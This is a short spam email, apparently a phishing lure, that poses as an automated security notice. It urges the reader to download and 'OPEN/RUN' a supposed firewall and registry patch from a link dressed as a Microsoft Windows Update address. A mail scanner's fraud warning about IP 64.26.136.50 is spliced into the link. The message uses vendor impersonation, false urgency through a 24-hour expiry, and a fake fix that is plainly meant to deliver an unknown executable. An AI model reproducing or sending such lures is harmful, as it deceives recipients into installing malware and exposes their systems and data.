Hello, Sorry for disturb, im a robot who send automaticly messages to all
users who have lower security on booting system.I sended you this email
to offer possibility to help you!The method to fix your errors and
vulnerability is to download our new patch, and to install it.This patch
will update your system firewall,will clean regedit and make and fix
yours bugs Mirror link of the patch is:MailScanner has detected a
possible fraud attempt from "64.26.136.50" claiming to be
http://www.microsoft.com/windows/update/download/fixpatch-ZBM80616180922460&log=cleanedNote:
Easy to install it just click on our site and use OPEN/RUN in like 30
seconds will be installed and wont need to restart your PC!
This link will expire in 24 hours after you got this email

believed to be clean.